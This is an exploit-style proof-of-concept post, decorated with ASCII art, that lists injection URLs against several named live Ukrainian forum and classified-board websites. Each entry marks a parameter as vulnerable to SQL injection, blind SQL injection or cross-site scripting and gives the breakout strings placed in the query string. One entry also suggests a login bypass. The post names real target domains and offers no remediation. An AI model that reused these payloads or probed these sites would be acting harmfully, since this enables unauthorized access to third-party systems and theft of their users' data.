\\ //
\\ //
\\ //
\\ //
\\ __ //
\\ [| |//
__ _\\E|_ //
| | |__\\__//___m____
| \_______________,---'' \'/' _______\_
>[====> ( : (O) [ | ] B
|: /~~~~~~~~~~~~~~~`---..__,/,\ ~~~~~~~/~
|__| |_//__\\|~~~w~~~~
// E| \\B ukraine
// [|__\\
// \\
// \\
// \\
// \\
// \\
#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => ???
#CMS => ukraina boards and forums
#Vulnz => XSS/Blind SQLi/SQLi
#Date => 28/03/2023
*PoC*
[code]
--------------------------------------------------------------------------------
http://photo.klimenko.kiev.ua/forum.php?c=search&search='-------'&submit=SEARCH |: <= $_POST SQLi #1
--------------------------------------------------------------------------------
https://www.stihi.in.ua/forum.php?cat=5'>\>">&page=2 |: <= XSS #2
----------------------------------------------------------------------------------------------------------------------------------
https://astrology.org.ua/thread.php?lang=en>\>">&appSize=0&page=1&v=20230324&thread=2198 |: <= XSS #3
----------------------------------------------------------------------------------------------------------------------------------
_______________________________________________
#DB type:*[Oracle]* | #4
|
Unknown column 'ob_ot\'' in 'order clause' |
_______________________________________________|__________________
http://board.veles.in.ua/board.php?act=cat&cat_id=1059&sort=-ob_ot|: <= Blind SQLi
------------------------------------------------------------------
___________________________
#DB version:*[MySQL >=5]* |______________________
http://www.moto.kiev.ua/forum/gallery.php?id=lazer|: <= Blind SQLi #5
--------------------------------------------------
_______________________________________
https://www.hata.dp.ua/board.php?cat=1 |: <= SQLi___________________________________________#6
https://www.hata.dp.ua/board.php#board_form <= login MySQL result error , can be bypassed??? |
---------------------------------------------------------------------------------------------
______________________________________
http://www.u-technik.com.ua/board.php |: <= Persistent XSS on page form ( probable buffer overflow) #7
-------------------------------------------------------------------
'>">\> |'>">\> |
------------------------------------------------------------------ |
'>">\> |
|
|
|
-------------------------------------------------------------------
[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*